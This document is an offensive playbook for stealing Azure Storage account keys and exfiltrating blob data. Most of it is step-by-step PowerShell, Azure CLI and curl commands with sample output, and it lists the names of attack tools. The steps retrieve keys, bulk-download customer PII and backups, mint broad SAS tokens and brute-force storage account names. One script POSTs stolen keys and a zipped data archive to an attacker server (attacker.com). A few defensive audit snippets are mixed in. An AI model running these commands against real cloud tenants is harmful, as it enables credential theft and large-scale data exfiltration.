MCADDF

CA-UNSC-008: Azure Storage Account Key Theft

1. METADATA HEADER

Attribute Details
Technique ID CA-UNSC-008
MITRE ATT&CK v18.1 T1552.001 - Unsecured Credentials: Credentials in Files + T1530 - Data from Cloud Storage Object
Tactic Credential Access (TA0006) + Collection (TA0009)
Platforms Azure (all cloud regions), Entra ID
Severity Critical
CVE CVE-2023-28432 (MinIO-related; Azure Storage similar patterns)
Technique Status ACTIVE
Last Verified 2026-01-06
Affected Versions All Azure regions, all storage types (Blob, File, Table, Queue)
Patched In Partial: User Delegation SAS recommended; Shared Key authorization disable available but rarely enforced
Author SERVTEP, Artur Pchelnikau

Note: Sections have been dynamically renumbered based on applicability. All sections required for Azure storage credential access attacks are included. This technique bridges both Credential Access (stealing keys) and Collection (downloading data). Windows-specific sections replaced with Azure diagnostic logging and real-time threat detection.


2. EXECUTIVE SUMMARY

Concept

Azure Storage Account Key theft is the unauthorized extraction and abuse of storage account access keys—master credentials that grant unrestricted access to all data in Azure Blob Storage, File Shares, Table Storage, and Queue Services. Attackers exploit weak RBAC configurations, privilege escalation vulnerabilities, or compromised service principal credentials to enumerate and retrieve storage account keys, enabling them to access, modify, or exfiltrate terabytes of business-critical data. The threat is particularly severe because a single compromised key permits full account compromise: read/write/delete permissions on all data containers, disabling of logging for hiding tracks, and modification of authentication policies. Unlike time-limited SAS tokens, storage account keys have indefinite validity, enabling persistent access even after the initial compromise vector is sealed.

Attack Surface

Business Impact

Compromised storage account keys enable attackers to exfiltrate petabytes of sensitive data, deploy malware via file shares, corrupt or delete backups, and establish persistent covert access to critical business systems without detection. Organizations report multi-month undetected dwell time because legitimate applications constantly access the same storage simultaneously, making attacker activity indistinguishable from normal operations. Storage account compromise often precedes ransomware deployment (attacker deletes backups before encryption), regulatory penalties under GDPR/HIPAA/SOX, and reputational damage.

Technical Context

Storage account key extraction typically requires either (1) RBAC role with Microsoft.Storage/storageAccounts/listKeys/action permission, (2) exploitation of misconfigured public access (no authentication), or (3) abuse of managed identity tokens from compromised compute resources. Data exfiltration is rapid (10+ GB/hour via AzCopy) and often undetected due to lack of baseline monitoring. Unlike on-premises file servers with network-based detection, cloud storage access is global—attacker can exfiltrate from any geographic location if authentication is valid. Storage account keys lack expiration, requiring manual rotation to invalidate stolen credentials.


Operational Risk

Dimension Assessment Details
Execution Risk Low Requires RBAC role or public access; no privilege escalation necessary if permissions already granted
Stealth High Legitimate workloads constantly access storage; bulk downloads hide in normal traffic if properly timed
Reversibility No Exfiltrated data cannot be “un-stolen.” Key rotation invalidates keys but doesn’t recover data.
Detection Likelihood Medium Requires diagnostic logging enabled + baseline anomaly analysis; most orgs lack storage monitoring
Scale of Impact Extreme Single storage account can contain petabytes; one key = total compromise
Data Exposure Window Months Undetected access often lasts 30-90 days before discovery via backup/audit analysis

Compliance Mappings

Framework Control / ID Description
CIS Benchmark 5.1.3, 5.2.1 Disable Shared Key authorization; Use SAS tokens or RBAC only
DISA STIG SC-28, IA-6 Information at Rest; Information System and Communications Protection
CISA SCuBA Data 1.1, Data 1.3 Restrict data access; Manage credentials lifecycle
NIST 800-53 SC-28, AC-6, IA-5 Information at Rest; Least Privilege; Authentication & Access Control
GDPR Art. 32, Art. 33, Art. 34 Security of Processing; Breach Notification (data exfil = mandatory notification)
DORA Art. 9 Protection and Prevention (financial sector must prevent key theft)
NIS2 Art. 21 Cyber Risk Management Measures (critical infrastructure key protection)
ISO 27001 A.10.1, A.8.3, A.13.1 Cryptography Policy; Access Control; Information Transfer Protection
ISO 27005 8.3 Risk Assessment; key theft scenario
HIPAA § 164.312(a)(2)(i) Data encryption at rest (storage keys protect this)
SOX § 404 IT General Controls (access to financial data storage)

3. TECHNICAL PREREQUISITES

Required Privileges & Access

Scenario Required Access Azure RBAC Action Authentication
Retrieve Storage Account Keys RBAC: Storage Account Key Operator Service Role (or Owner/Contributor) Microsoft.Storage/storageAccounts/listKeys/action Service Principal, User, Managed Identity
Generate SAS Token Key or delegation access (if key-signed) Microsoft.Storage/storageAccounts/listAccountSas/action Must have key or delegation ability
Access Public Blob (No Auth) Public container access enabled None Anonymous HTTP access
Enumerate Storage Accounts List permission or public enumeration Microsoft.Storage/storageAccounts/read Any authenticated user (or DNS brute-force)
Extract Cloud Shell Credentials Access to Cloud Shell container Managed Identity of Cloud Shell Azure compute with storage identity

Supported Versions

Azure Component Supported Details
Azure Blob Storage ✅ All versions (all regions) Primary target (largest data volumes)
Azure File Shares ✅ All versions SMB protocol over HTTPS; same key-based auth
Table Storage ✅ All versions NoSQL; same shared key auth
Queue Storage ✅ All versions Message queues; same shared key auth
Azure Storage (Premium) ✅ All versions Premium tier; same access keys
Azure Data Lake Storage (ADLS) ✅ Partial (primarily uses RBAC) Hierarchy; keys still valid but RBAC preferred
Azure Synapse ✅ Connected to storage accounts Accesses via storage keys or RBAC

Required Tools & Components

Tool Version URL Purpose Privilege Level
Azure PowerShell (Az.Storage) 5.0+ https://github.com/Azure/azure-powershell Key retrieval, blob operations ⚠️ High (listKeys required)
Azure CLI 2.30+ https://learn.microsoft.com/cli/azure/ Alternative to PowerShell ⚠️ High (listKeys required)
AzCopy 10.0+ https://learn.microsoft.com/azure/storage/common/storage-use-azcopy Bulk data transfer (highly detectable) ✅ Uses keys/SAS
Rclone 1.50+ https://rclone.org/ Cross-cloud sync (suspicious user agent) ✅ Uses keys/SAS
Azure Storage Explorer 1.20+ Microsoft Store GUI blob/file browser (leaves process artifacts) ✅ Uses keys/SAS
Azure SDK (Python/C#/.NET) Latest https://github.com/Azure/azure-sdk Programmatic access (custom scripts) ✅ Uses keys/SAS
curl / wget Built-in Native utilities Direct HTTP/HTTPS requests (URL with SAS) ✅ Uses SAS tokens
Goblob Latest https://github.com/RiskIQ/goblob Bruteforce storage account name enumeration ✅ Public access discovery
QuickAZ Latest https://github.com/vulnersCom/QuickAZ DNS-based storage account enumeration ✅ Public discovery

4. ENVIRONMENTAL RECONNAISSANCE

Management Station / PowerShell Reconnaissance

Step 1: Enumerate Storage Accounts in Subscription

Objective: Discover all storage accounts accessible from current identity to identify targets containing sensitive data (databases, backups, customer data).

Command (All Versions):

# Connect to Azure
Connect-AzAccount

# List all storage accounts in current subscription
Get-AzStorageAccount | Select-Object StorageAccountName, ResourceGroupName, Location, SkuName

# Get more details (including access tier, https enforcement, diagnostics)
Get-AzStorageAccount | ForEach-Object {
    Write-Host "Storage Account: $($_.StorageAccountName)"
    Write-Host "  Resource Group: $($_.ResourceGroupName)"
    Write-Host "  Location: $($_.Location)"
    Write-Host "  Sku: $($_.SkuName)"
    Write-Host "  HTTPS Only: $($_.EnableHttpsTrafficOnly)"
    Write-Host "  Shared Key Access: $($_.AllowSharedKeyAccess)"  # Check if keys disabled
    Write-Host "  ---"
}

# Get subscription ID for scoping
$SubId = (Get-AzContext).Subscription.Id  # Get-AzSubscription returns an array when multiple subscriptions exist
Write-Host "Current Subscription: $SubId"

Expected Output:

Storage Account: prodstorageacct001
  Resource Group: production-rg
  Location: eastus
  Sku: Standard_LRS
  HTTPS Only: True
  Shared Key Access: True

Storage Account: backupstorageacct002
  Resource Group: backup-rg
  Location: westus
  Sku: Premium_LRS
  HTTPS Only: True
  Shared Key Access: False

Current Subscription: a1b2c3d4-e5f6-7890-abcd-ef1234567890

What This Means:

Red Flags (Vulnerable Configuration):

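Red-flag spotting over many accounts can be scripted. A minimal Python sketch (field names assumed from the camelCase JSON that `az storage account list --output json` emits; the sample records are invented) that flags accounts still honoring Shared Key or anonymous blob access:

```python
import json

# Sample shaped like `az storage account list` output, trimmed to the
# properties checked here (field names are an assumption from the CLI JSON).
sample = json.loads("""
[
  {"name": "prodstorageacct001", "enableHttpsTrafficOnly": true,
   "allowSharedKeyAccess": true, "allowBlobPublicAccess": true},
  {"name": "backupstorageacct002", "enableHttpsTrafficOnly": true,
   "allowSharedKeyAccess": false, "allowBlobPublicAccess": false}
]
""")

def risk_flags(acct):
    """Return a list of red-flag strings for one account record."""
    flags = []
    # Shared Key enabled means a stolen key grants full data-plane access.
    if acct.get("allowSharedKeyAccess", True):
        flags.append("shared-key-enabled")
    # Public blob access allows anonymous reads on misconfigured containers.
    if acct.get("allowBlobPublicAccess"):
        flags.append("public-blob-access")
    if not acct.get("enableHttpsTrafficOnly", False):
        flags.append("http-allowed")
    return flags

for acct in sample:
    print(acct["name"], risk_flags(acct))
```

Feeding real CLI output through the same function turns the manual portal review into a repeatable check.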

Step 2: Check Current User Permissions on Storage Account

Objective: Verify if current identity can retrieve storage account keys (permission to Microsoft.Storage/storageAccounts/listKeys/action).

Command (All Versions):

# Get current user context
$CurrentUser = (Get-AzContext).Account.Id
Write-Host "Current Identity: $CurrentUser"

# Check if we can list storage account keys
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"

try {
    $Keys = Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName -ErrorAction Stop
    Write-Host "[+] SUCCESS: Can retrieve storage account keys!" -ForegroundColor Green
    Write-Host "[+] Primary Key: $($Keys[0].Value.Substring(0, 20))..." -ForegroundColor Green
    Write-Host "[+] Secondary Key: $($Keys[1].Value.Substring(0, 20))..." -ForegroundColor Green
} catch {
    Write-Host "[-] Access Denied: Cannot retrieve storage account keys" -ForegroundColor Red
    Write-Host "[-] Error: $($_.Exception.Message)"
}

# Check RBAC role for storage account
$StorageRBACRoles = Get-AzRoleAssignment -ResourceGroupName $ResourceGroupName -ResourceName $StorageAccountName -ResourceType "Microsoft.Storage/storageAccounts"
Write-Host "`nCurrent RBAC Assignments:"
$StorageRBACRoles | Select-Object DisplayName, RoleDefinitionName | Format-Table

Expected Output (Vulnerable):

Current Identity: user@contoso.com

[+] SUCCESS: Can retrieve storage account keys!
[+] Primary Key: ABC123DEF456ABC123DE...
[+] Secondary Key: XYZ789ABC123XYZ789AB...

Current RBAC Assignments:

DisplayName            RoleDefinitionName
-----------            ------------------
user@contoso.com       Storage Account Key Operator Service Role
user@contoso.com       Contributor

Expected Output (Secure):

[-] Access Denied: Cannot retrieve storage account keys
[-] Error: User does not have permission to access this resource

Current RBAC Assignments:

DisplayName            RoleDefinitionName
-----------            ------------------
user@contoso.com       Reader

What This Means:

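The RBAC output above is what decides whether key retrieval succeeds. As a rough triage aid (the role list is a partial, hand-maintained set; a real audit should resolve role definitions against ARM rather than trust display names), a sketch:

```python
# Built-in roles known to include Microsoft.Storage/storageAccounts/listKeys/action.
# Partial list for triage only; resolve actual role definitions for a real audit.
KEY_CAPABLE_ROLES = {
    "Owner",
    "Contributor",
    "Storage Account Contributor",
    "Storage Account Key Operator Service Role",
}

def can_list_keys(assignments):
    """True if any assigned role display name is known to grant listKeys."""
    return any(role in KEY_CAPABLE_ROLES for role in assignments)

print(can_list_keys(["Reader"]))                 # the "secure" output above
print(can_list_keys(["Contributor", "Reader"]))  # the "vulnerable" output above
```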

Step 3: Enumerate Containers and Data Volume

Objective: Identify high-value targets (large data volumes, sensitive data types) before extraction.

Command (All Versions):

# Get storage account key (if accessible)
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"

$StorageAccountKey = (Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName)[0].Value

# Create storage context
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageAccountKey

# List all containers
$Containers = Get-AzStorageContainer -Context $StorageContext
Write-Host "Containers in $StorageAccountName : $($Containers.Count)"
$Containers | Select-Object Name | Format-Table

# Enumerate container contents and sizes
foreach ($Container in $Containers) {
    $Blobs = Get-AzStorageBlob -Container $Container.Name -Context $StorageContext
    $TotalSize = ($Blobs | Measure-Object -Property Length -Sum).Sum / 1GB
    
    Write-Host "Container: $($Container.Name)"
    Write-Host "  Blob Count: $($Blobs.Count)"
    Write-Host "  Total Size: $($TotalSize.ToString('F2')) GB"
    Write-Host "  Sample Files:"
    $Blobs | Select-Object -First 5 Name | ForEach-Object { Write-Host "    - $($_.Name)" }
    Write-Host "  ---"
}

Expected Output:

Containers in prodstorageacct001 : 5

Name
----
backups
customer-data
logs
temp
uploads

Container: backups
  Blob Count: 2145
  Total Size: 850.34 GB
  Sample Files:
    - database-backup-2026-01-06.bak
    - database-backup-2026-01-05.bak
    - application-config-backup.zip
    - vm-image-disk-1.vhd

Container: customer-data
  Blob Count: 45632
  Total Size: 1200.56 GB
  Sample Files:
    - customer-pii-export-2026.csv
    - customer-financial-records.xlsx
    - customer-emails-backup.sql

Container: logs
  Blob Count: 89234
  Total Size: 450.12 GB
  Sample Files:
    - 2026-01-06-application.log
    - 2026-01-06-access.log

What This Means:

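The per-container sizing loop above reduces to a small aggregation. A Python equivalent over invented (container, blob name, size) records, useful for post-processing an exported listing:

```python
from collections import defaultdict

# Flat (container, blob_name, size_bytes) records, as the enumeration loop yields.
blobs = [
    ("backups", "database-backup-2026-01-06.bak", 400 * 1024**3),
    ("backups", "database-backup-2026-01-05.bak", 450 * 1024**3),
    ("customer-data", "customer-pii-export-2026.csv", 2 * 1024**3),
]

def container_totals(records):
    """Aggregate blob count and total GiB per container."""
    totals = defaultdict(lambda: [0, 0])  # name -> [count, bytes]
    for container, _name, size in records:
        totals[container][0] += 1
        totals[container][1] += size
    return {c: (n, round(b / 1024**3, 2)) for c, (n, b) in totals.items()}

for name, (count, gib) in container_totals(blobs).items():
    print(f"{name}: {count} blobs, {gib} GiB")
```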

Linux/Bash / Azure CLI Reconnaissance

Step 1: Enumerate Storage Accounts via Azure CLI

Objective: Discover storage accounts using Azure CLI (useful in containerized/Linux environments).

Command (All Versions - Bash):

# Authenticate to Azure
az login

# List all storage accounts in current subscription
az storage account list --output table

# Get detailed information
az storage account list --query "[].{Name:name, ResourceGroup:resourceGroup, Location:location, HttpsOnly:enableHttpsTrafficOnly, SharedKeyAccess:allowSharedKeyAccess}"

# Get current subscription
az account show --query name

Expected Output:

Name                       ResourceGroup    Location    HttpsOnly    SharedKeyAccess
-------------------------  ---------------  ---------   ----------   ---------------
prodstorageacct001         production-rg    eastus      true         true
backupstorageacct002       backup-rg        westus      true         false

Step 2: Enumerate Blobs via Azure CLI

Objective: List containers and blobs using Azure CLI.

Command (All Versions - Bash):

# List containers
az storage container list --account-name prodstorageacct001 --account-key <storage-key> --output table

# List blobs in container
az storage blob list --account-name prodstorageacct001 --container-name customer-data --account-key <storage-key> --output table
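Under the hood, both the CLI listing and the raw REST call return the same `EnumerationResults` XML (shown later in the public-container section). A stdlib-only sketch of parsing it (sample document invented; the Blob service listing response carries no XML namespace):

```python
import xml.etree.ElementTree as ET

# Minimal EnumerationResults document as returned by
# GET https://<acct>.blob.core.windows.net/<container>?restype=container&comp=list
xml_doc = """<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults>
  <Blobs>
    <Blob><Name>database-backup-2026-01-06.bak</Name>
      <Properties><Content-Length>850000000000</Content-Length></Properties></Blob>
    <Blob><Name>app.log</Name>
      <Properties><Content-Length>1024</Content-Length></Properties></Blob>
  </Blobs>
</EnumerationResults>"""

def parse_blob_listing(doc):
    """Yield (name, size_bytes) for each blob in a listing response."""
    root = ET.fromstring(doc)
    for blob in root.iter("Blob"):
        name = blob.findtext("Name")
        size = int(blob.findtext("Properties/Content-Length") or 0)
        yield name, size

listing = list(parse_blob_listing(xml_doc))
print(listing)
```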

5. DETAILED EXECUTION METHODS AND THEIR STEPS


METHOD 1: Direct Storage Account Key Retrieval & Data Exfiltration (Authorized Access)

Supported Versions: All Azure regions, all storage types

Prerequisites: Entra ID authentication with Storage Account Key Operator Service Role or higher (or Owner/Contributor); network connectivity to Azure Management API (https://management.azure.com)


Step 1: Authenticate to Azure

Objective: Obtain Entra ID access token required to authenticate to Azure Management API and retrieve storage account keys.

Command (Interactive User Login - All Versions):

# Interactive login (prompts for browser authentication)
Connect-AzAccount

# Verify successful authentication
$Context = Get-AzContext
Write-Host "Authenticated as: $($Context.Account.Id)"
Write-Host "Subscription: $($Context.Subscription.Name)"

Command (Service Principal Authentication - All Versions):

# Using tenant/client secret (common in automation)
$TenantId = "contoso.onmicrosoft.com"
$AppId = "a1b2c3d4-e5f6-7890-abcd-ef1234567890"
$ClientSecret = "client-secret-value"

$SecureSecret = ConvertTo-SecureString -String $ClientSecret -AsPlainText -Force
Connect-AzAccount -ServicePrincipal -Credential (New-Object PSCredential($AppId, $SecureSecret)) -TenantId $TenantId

# Verify
$Context = Get-AzContext
Write-Host "[+] Authenticated as service principal: $($Context.Account.Id)"

Expected Output:

Authenticated as: user@contoso.com
Subscription: Production-Subscription

[+] Authenticated as service principal: a1b2c3d4-e5f6-7890-abcd-ef1234567890

Step 2: Retrieve Storage Account Keys

Objective: Extract the primary and secondary access keys from the storage account (keys provide unrestricted access to all data).

Command (All Versions):

# Retrieve storage account keys
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"

$StorageKeys = Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName

# Display keys
$PrimaryKey = $StorageKeys[0].Value
$SecondaryKey = $StorageKeys[1].Value

Write-Host "Primary Key: $PrimaryKey"
Write-Host "Secondary Key: $SecondaryKey"
Write-Host "[+] Keys retrieved successfully"

# Alternative: Get connection string (combines storage account name + key)
$StorageAccount = Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName
$ConnectionString = "DefaultEndpointsProtocol=https;AccountName=$StorageAccountName;AccountKey=$PrimaryKey;EndpointSuffix=core.windows.net"
Write-Host "Connection String: $ConnectionString"

Expected Output:

Primary Key: ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123==
Secondary Key: XYZ789ABC123XYZ789ABC123XYZ789ABC123XYZ789ABC123XYZ789ABC123ABC==
[+] Keys retrieved successfully

Connection String: DefaultEndpointsProtocol=https;AccountName=prodstorageacct001;AccountKey=ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123==;EndpointSuffix=core.windows.net
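Connection strings like the one above frequently leak into source trees and config files. A minimal parser (illustrative only) of the kind a secret-scanning pipeline could use to pull out the account name and flag an embedded key for rotation:

```python
def parse_connection_string(conn):
    """Split an Azure Storage connection string into its key=value parts."""
    return dict(
        segment.split("=", 1)          # split on first "=" only: keys end in "=="
        for segment in conn.strip(";").split(";")
        if segment
    )

conn = ("DefaultEndpointsProtocol=https;AccountName=prodstorageacct001;"
        "AccountKey=ABC123DEF456==;EndpointSuffix=core.windows.net")
parts = parse_connection_string(conn)
print(parts["AccountName"])
# An AccountKey present in source or config is itself a finding worth rotating.
print("AccountKey" in parts)
```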

What This Means:

Business Impact (Post-Extraction):

Version Note: Command identical across all Azure regions and subscription types.

OpSec & Evasion:

Troubleshooting:

References:


Step 3: Create Storage Context and List Containers

Objective: Use retrieved key to authenticate to storage account and enumerate containers (identify data to exfiltrate).

Command (All Versions):

# Create storage context with primary key
$StorageAccountName = "prodstorageacct001"
$StorageAccountKey = "ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123DEF456ABC123=="

$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageAccountKey

# List all containers
$Containers = Get-AzStorageContainer -Context $StorageContext
Write-Host "Containers found: $($Containers.Count)"
$Containers | Select-Object Name, Properties | Format-Table

# Get container details
foreach ($Container in $Containers) {
    $Blobs = Get-AzStorageBlob -Container $Container.Name -Context $StorageContext
    Write-Host "Container: $($Container.Name) - $($Blobs.Count) blobs"
}

Expected Output:

Containers found: 5

Name              Properties
----              ----------
backups           Microsoft.Azure.Storage.Blob.BlobContainerProperties
customer-data     Microsoft.Azure.Storage.Blob.BlobContainerProperties
logs              Microsoft.Azure.Storage.Blob.BlobContainerProperties
temp              Microsoft.Azure.Storage.Blob.BlobContainerProperties
uploads           Microsoft.Azure.Storage.Blob.BlobContainerProperties

Container: backups - 2145 blobs
Container: customer-data - 45632 blobs
Container: logs - 89234 blobs
Container: temp - 523 blobs
Container: uploads - 1204 blobs

Step 4: Download Data (Bulk Exfiltration)

Objective: Extract sensitive data from containers using storage key.

Command (Download Single Blob - All Versions):

# Download single blob
$StorageContext = New-AzStorageContext -StorageAccountName "prodstorageacct001" -StorageAccountKey "ABC123DEF456..."

$BlobName = "customer-pii-export-2026.csv"
$ContainerName = "customer-data"
$DownloadPath = "C:\Temp\customer-pii-export-2026.csv"

Get-AzStorageBlobContent -Blob $BlobName -Container $ContainerName -Destination $DownloadPath -Context $StorageContext

Write-Host "[+] Downloaded: $BlobName to $DownloadPath"

Command (Bulk Download Using AzCopy - Faster, More Detectable):

# AzCopy is optimized for bulk transfers (faster than PowerShell)
$StorageAccountName = "prodstorageacct001"
$StorageAccountKey = "ABC123DEF456..."
$ContainerName = "customer-data"
$DownloadPath = "C:\Temp\exfil"

# Create download directory
New-Item -ItemType Directory -Path $DownloadPath -Force

# Use AzCopy (much faster than PowerShell); AzCopy takes a SAS token in the
# URL, not the raw account key, so mint a short-lived read/list SAS first
$AzCopyPath = "C:\Program Files\AzCopy\azcopy.exe"
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageAccountKey
$SasToken = New-AzStorageAccountSASToken -Service Blob -ResourceType Service,Container,Object `
    -Permission rl -ExpiryTime (Get-Date).AddHours(4) -Context $StorageContext
$SourceUri = "https://$StorageAccountName.blob.core.windows.net/$ContainerName"

# The Az module returns the SAS token with its leading "?" already included
& $AzCopyPath copy "$SourceUri$SasToken" $DownloadPath --recursive

Write-Host "[+] Bulk download complete: $DownloadPath"

Expected Output (PowerShell):

[+] Downloaded: customer-pii-export-2026.csv to C:\Temp\customer-pii-export-2026.csv

Expected Output (AzCopy):

Final Job Status: Completed
Total Number of Transfers: 12345 (0 failed, 0 skipped)
Average transfer speed: ~150 MB/s
[+] Bulk download complete: C:\Temp\exfil

What This Means:

Business Impact:

Version Note: AzCopy available on Windows/Linux/Mac.

OpSec & Evasion:

Troubleshooting:

References:
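Back-of-envelope math on the quoted ~150 MB/s AzCopy rate gives defenders the realistic detection window for a bulk pull. A small sketch (decimal units assumed):

```python
def transfer_hours(total_gb, rate_mb_per_s):
    """Hours to move total_gb at a sustained rate (decimal GB/MB)."""
    seconds = (total_gb * 1000) / rate_mb_per_s
    return seconds / 3600

# The 1.2 TB customer-data container at ~150 MB/s leaves the account in
# roughly 2.2 hours -- the window in which detection has to fire.
print(round(transfer_hours(1200, 150), 1))
```

Alerting pipelines with hourly aggregation windows therefore get at most one or two chances to flag a transfer of this size.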


Step 5: Exfiltrate Keys/Data to Attacker Infrastructure

Objective: Secure stolen data and keys for long-term access.

Command (Upload Keys to Attacker Server - HTTPS):

# Exfiltrate storage key and connection string
$StorageAccountName = "prodstorageacct001"
$StorageKeys = Get-AzStorageAccountKey -ResourceGroupName "production-rg" -AccountName $StorageAccountName
$PrimaryKey = $StorageKeys[0].Value

$ExfiltrationData = @{
    StorageAccountName = $StorageAccountName
    PrimaryKey = $PrimaryKey
    SecondaryKey = $StorageKeys[1].Value
    TimeExtracted = (Get-Date).ToString()
}

$JsonBody = $ExfiltrationData | ConvertTo-Json

# Send to attacker C2 server
$Uri = "https://attacker.com:8443/upload"
try {
    $Response = Invoke-WebRequest -Uri $Uri -Method POST -Body $JsonBody -ContentType "application/json"
    Write-Host "[+] Storage keys exfiltrated to $Uri" -ForegroundColor Green
} catch {
    Write-Host "[-] Exfiltration failed: $_"
}

Command (Download Data from Local Storage to Attacker Server):

# After downloading data locally, compress and exfiltrate
$LocalDataPath = "C:\Temp\exfil\customer-data"
$ZipPath = "C:\Temp\customer-data.zip"

# Compress
Compress-Archive -Path $LocalDataPath -DestinationPath $ZipPath -CompressionLevel Maximum

# Exfiltrate
$Uri = "https://attacker.com:8443/upload"
$FileBytes = [System.IO.File]::ReadAllBytes($ZipPath)
$Request = [System.Net.HttpWebRequest]::CreateHttp($Uri)
$Request.Method = "POST"
$Request.ContentType = "application/zip"
$Request.ContentLength = $FileBytes.Length
$RequestStream = $Request.GetRequestStream()
$RequestStream.Write($FileBytes, 0, $FileBytes.Length)
$RequestStream.Close()
$Response = $Request.GetResponse()

Write-Host "[+] Data exfiltrated: $(Get-Item $ZipPath | Select-Object -ExpandProperty Length) bytes"

Expected Output:

[+] Storage keys exfiltrated to https://attacker.com:8443/upload
[+] Data exfiltrated: 1200568000000 bytes (~1.2 TB)

METHOD 2: SAS Token Generation & Exfiltration (If Key Access Available)

Supported Versions: All Azure regions

Prerequisites: Access to storage account key (from METHOD 1) or delegation access

Difficulty: Medium (requires understanding of SAS token permissions and scope)


Step 1: Generate Account-Level SAS Token

Objective: Create a limited-time, limited-permission SAS token signed with storage account key (enables sharing of key without exposing full account key).

Command (All Versions):

# Get storage account key
$StorageAccountName = "prodstorageacct001"
$ResourceGroupName = "production-rg"
$StorageKeys = Get-AzStorageAccountKey -ResourceGroupName $ResourceGroupName -AccountName $StorageAccountName
$StorageKey = $StorageKeys[0].Value

# Create storage context
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -StorageAccountKey $StorageKey

# Generate Account-Level SAS Token (grants broad access)
$SASToken = New-AzStorageAccountSASToken -Service Blob,File,Table,Queue `
    -ResourceType Service,Container,Object `
    -Permission racwd `
    -ExpiryTime (Get-Date).AddHours(24) `
    -Context $StorageContext

Write-Host "Generated SAS Token: $SASToken"
Write-Host "[+] Token valid for 24 hours"

# Create URL with SAS token (can be shared/exfiltrated); the returned
# token already carries its leading "?"
$SASUri = "https://$StorageAccountName.blob.core.windows.net$SASToken"
Write-Host "SAS URI: $SASUri"

Expected Output:

Generated SAS Token: sv=2021-06-08&ss=bfqt&srt=sco&sp=racwd&se=2026-01-07T11:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=ABC123DEF456ABC123DEF456ABC123DEF456==

[+] Token valid for 24 hours

SAS URI: https://prodstorageacct001.blob.core.windows.net?sv=2021-06-08&ss=bfqt&srt=sco&sp=racwd&se=2026-01-07T11:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=ABC123DEF456ABC123DEF456ABC123DEF456==

What This Means:

Advantages of SAS over Full Key:
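SAS tokens are self-describing query strings, so their blast radius can be audited offline. A hedged sketch (parameter meanings follow the `ss`/`sp`/`srt`/`se` fields visible in the output above; the `sig` value here is a placeholder):

```python
from urllib.parse import parse_qs
from datetime import datetime, timezone

def audit_sas(token):
    """Summarize scope and lifetime of an account SAS token string."""
    q = {k: v[0] for k, v in parse_qs(token.lstrip("?")).items()}
    expiry = datetime.strptime(q["se"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {
        "services": q.get("ss", ""),        # b=blob f=file q=queue t=table
        "permissions": q.get("sp", ""),     # r=read a=add c=create w=write d=delete
        "resource_types": q.get("srt", ""),
        "expires": expiry.isoformat(),
        # Any of add/create/write/delete makes the token more than read-only.
        "write_capable": any(p in q.get("sp", "") for p in "acwd"),
    }

token = ("sv=2021-06-08&ss=bfqt&srt=sco&sp=racwd"
         "&se=2026-01-07T11:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=XXX")
print(audit_sas(token))
```

A token scoped to all four services with `racwd` permissions, as generated above, is nearly as dangerous as the key itself for its lifetime.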


Step 2: Use SAS Token to Access Storage (Attacker-Side)

Objective: Demonstrate how attacker can use SAS token to access storage without account key.

Command (All Versions - From Attacker System):

# Attacker has SAS token (no account key needed)
$SASToken = "sv=2021-06-08&ss=bfqt&srt=sco&sp=racwd&se=2026-01-07T11:06:00Z&st=2026-01-06T11:06:00Z&spr=https&sig=ABC123DEF456ABC123DEF456ABC123DEF456=="
$StorageAccountName = "prodstorageacct001"

# Create storage context with SAS (no key needed)
$StorageContext = New-AzStorageContext -StorageAccountName $StorageAccountName -SasToken $SASToken

# Access data with SAS token
$Containers = Get-AzStorageContainer -Context $StorageContext
Write-Host "[+] Accessed storage with SAS token: $($Containers.Count) containers found"

# Download blob with SAS token
Get-AzStorageBlobContent -Blob "customer-data.csv" -Container "customer-data" -Destination "C:\Temp\" -Context $StorageContext
Write-Host "[+] Downloaded blob using SAS token"

Expected Output:

[+] Accessed storage with SAS token: 5 containers found
[+] Downloaded blob using SAS token

Business Impact:


METHOD 3: Public Blob/Container Enumeration (No Authentication)

Supported Versions: All Azure regions

Prerequisites: Public container access enabled (no authentication required)

Difficulty: Low (requires only enumeration, no credentials)


Step 1: Bruteforce Storage Account Names

Objective: Discover Azure Storage accounts by guessing common naming patterns.

Command (Goblob Enumeration Tool - Linux):

# Install Goblob
git clone https://github.com/RiskIQ/goblob.git
cd goblob
pip install -r requirements.txt

# Bruteforce storage account names
python goblob.py -w wordlist.txt --thread 50

# Common wordlist patterns
# - company name: "contoso", "acmecorp", "mycompany"
# - storage purpose: "backup", "data", "logs", "prod", "dev"
# - combinations: "contosobkp", "contosoprod", "acmedata"

Command (QuickAZ - DNS-Based Enumeration):

# Install QuickAZ
pip install quickaz

# Scan for storage accounts
quickaz -w wordlist.txt -t 100

# Output: List of valid storage accounts with public containers

Expected Output:

[+] Found storage account: contosobackup.blob.core.windows.net (ACCESSIBLE)
[+] Found storage account: contosoprod.blob.core.windows.net (ACCESSIBLE)
[+] Found storage account: acmecorplogs.blob.core.windows.net (ACCESSIBLE)

Container: backups (public read)
Container: customer-data (public read)
Container: logs (public read)

What This Means:


Step 2: Download Data from Public Containers

Objective: Exfiltrate data from publicly accessible containers.

Command (All Versions - Using curl):

# List blobs in public container (quote the URL so "&" is not treated as a shell operator)
curl "https://contosobackup.blob.core.windows.net/backups?restype=container&comp=list"

# Download blob from public container (no authentication)
curl "https://contosobackup.blob.core.windows.net/backups/database-backup-2026-01-06.bak" -o database-backup-2026-01-06.bak

# Bulk download: iterate over the names in the XML listing
